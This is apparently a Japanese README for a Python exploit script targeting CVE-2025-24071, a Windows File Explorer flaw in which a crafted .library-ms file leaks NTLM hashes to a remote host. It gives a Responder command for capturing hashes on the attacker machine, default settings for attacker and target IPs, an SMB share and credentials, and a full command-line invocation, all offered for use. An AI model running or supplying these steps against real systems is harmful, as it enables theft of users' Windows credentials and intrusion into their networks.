
CVE-2025-24071を実行するためのPythonスクリプト
このプロジェクトは、Windows ファイルエクスプローラーのなりすまし脆弱性の検出と悪用の実証を行います。
問題は、ネットワークパスを含む Windows ライブラリファイル(.library-ms) が、直接の添付ファイルとして、またはアーカイブに埋め込まれて存在することに起因します。
このファイルを開くと、Windows がリモート(潜在的に悪意のある)ネットワークロケーションに NTLM ハッシュを漏洩 させる可能性があります。
攻撃マシン上で Responder を実行し、NTLM ハッシュをキャプチャします:
sudo responder -I tun0 -wvF
スクリプトの設定方法は2つあります:
✅ オプションA: デフォルトを編集(最も簡単)
スクリプト内のデフォルトパラメータを直接変更します。
parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP") #your IP
parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP") #target IP
parser.add_argument("--share-name", default="IT", help="SMB share name") #name of the share you have access to without the /
parser.add_argument("--username", default="USERNAME", help="SMB username") #username of the share owner
parser.add_argument("--password", default="PASSWORD", help="SMB password") #password of the share owner
parser.add_argument("--interface", default="tun0", help="Responder network interface") #check ifconfig but tun0 will work if you're on a vpn
return parser.parse_args()
✅ オプションB: CLI パラメータで実行
引数付きで実行します:
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>